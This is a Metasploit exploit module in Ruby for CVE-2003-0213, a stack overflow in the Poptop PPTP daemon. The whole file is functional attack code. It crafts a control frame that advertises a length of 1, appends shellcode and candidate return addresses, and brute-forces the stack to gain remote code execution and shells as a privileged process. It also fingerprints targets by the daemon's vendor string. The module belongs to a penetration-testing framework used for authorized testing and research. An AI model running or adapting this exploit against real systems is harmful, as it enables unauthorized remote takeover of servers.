Path: blob/master/modules/exploits/linux/pptp/poptop_negative_read.rb
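##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Poptop (PPTP daemon) negative-read overflow, CVE-2003-0213.
#
# A control frame that advertises a length smaller than the fixed header
# makes the server compute a negative remaining-read length; the payload
# that follows the frame is copied over the stack and execution resumes at
# one of the guessed return addresses appended after it. The return address
# is brute-forced by the Brute mixin, so each attempt opens its own
# connection and a fresh manager process on the target.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Brute

  # Width in bytes of the Hostname and Vendor fields of the control frame.
  FIELD_WIDTH = 64

  # Total size of the frame emitted by build_packet, in bytes:
  # 12 (length/type/cookie/ctrl type/reserved) + 2 (version) + 2 (reserved)
  # + 12 (framing/bearer/max channels/firmware) + 64 (hostname) + 64 (vendor).
  # The check probe advertises exactly this value so the wire length and the
  # length field agree.
  FRAME_LENGTH = 156

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Poptop Negative Read Overflow',
      'Description'    => %q{
        This is an exploit for the Poptop negative read overflow. This will
        work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
        currently do not have a good way to detect Poptop versions.

        The server will by default only allow 4 concurrent manager processes
        (what we run our code in), so you could have a max of 4 shells at once.

        Using the current method of exploitation, our socket will be closed
        before we have the ability to run code, preventing the use of Findsock.
      },
      'Author'         => 'spoonm',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2003-0213'],
          ['OSVDB', '3293'],
          ['URL', 'http://securityfocus.com/archive/1/317995'],
          ['URL', 'http://www.freewebs.com/blightninjas/'],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          # Payload space is dynamically determined (see payload_space)
          'MinNops'         => 16,
          'StackAdjustment' => -1088,
          'Compat'          =>
            {
              'ConnectionType' => '-find',
            }
        },
      'SaveRegisters'  => [ 'esp' ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          ['Linux Bruteforce',
            { 'Bruteforce' =>
              {
                # Walk the stack downwards; Step 0 lets the mixin pick the
                # stride from the payload's NOP sled.
                'Start' => { 'Ret' => 0xbffffa00 },
                'Stop'  => { 'Ret' => 0xbffff000 },
                'Step'  => 0
              }
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2003-04-09'))

    register_options(
      [
        Opt::RPORT(1723)
      ])

    register_advanced_options(
      [
        OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]),
        OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]),
        OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. " +
          "ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). " +
          "If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " +
          "(these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
        OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]),
        OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
      ])
  end

  # Dynamic payload space calculation: the bytes that precede the saved
  # return address plus any extra bytes the operator chose to steal from the
  # protocol frame. The target argument is part of the framework interface
  # and is not needed here.
  def payload_space(explicit_target = nil)
    datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
  end

  # Coerce an option value to a fixed-width, NUL-padded field. The value is
  # truncated as well as padded so an oversized Hostname/Vendor cannot grow
  # the frame past FRAME_LENGTH and desynchronise the advertised length.
  def fixed_field(value)
    value.to_s[0, FIELD_WIDTH].ljust(FIELD_WIDTH, "\x00")
  end

  # Build a PPTP start-control-connection request frame that advertises
  # `length` as its total size. Only the length field is variable; every
  # other field is a constant, so the frame is always FRAME_LENGTH bytes.
  # A `length` smaller than the header is what triggers the bug.
  def build_packet(length)
    [length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') + # length, msg type, magic cookie, ctrl msg type 1, reserved
      [1, 0].pack('cc') +                          # protocol version 1.0
      [0].pack('n') +                              # reserved
      [1, 1, 0, 2600].pack('NNnn') +               # framing caps, bearer caps, max channels, firmware rev
      fixed_field(datastore['Hostname']) +
      fixed_field(datastore['Vendor'])
  end

  # Send a well-formed control request and look for Poptop's vendor string in
  # the reply. This only identifies the daemon, not its version, so the best
  # positive answer is Detected; no reply at all is reported as Unknown
  # rather than Safe, since a timeout says nothing about the target.
  # The connection is always torn down, including on error.
  def check
    connect
    sock.put(build_packet(FRAME_LENGTH))
    res = sock.get_once

    return CheckCode::Unknown if res.nil?
    return CheckCode::Detected if res.include?('MoretonBay')

    CheckCode::Safe
  ensure
    disconnect
  end

  # One brute-force attempt: send a frame with a bogus length of 1, the
  # encoded payload, and `RetLength` bytes of the candidate return address.
  # RetLength is rounded down to whole 4-byte addresses; a value below 4
  # would send no return address at all and is rejected up front.
  # The socket is closed in `ensure` so a failed write cannot leak it.
  def brute_exploit(addrs)
    ret = addrs['Ret']
    ret_count = datastore['RetLength'].to_i / 4
    if ret_count < 1
      fail_with(Failure::BadConfig, 'RetLength must be at least 4 bytes (one return address)')
    end

    connect

    print_status("Trying #{"%.8x" % ret}...")

    # Construct the evil length packet
    packet =
      build_packet(1) +
      payload.encoded +
      ([ret].pack('V') * ret_count)

    sock.put(packet)

    handler
  ensure
    disconnect
  end
end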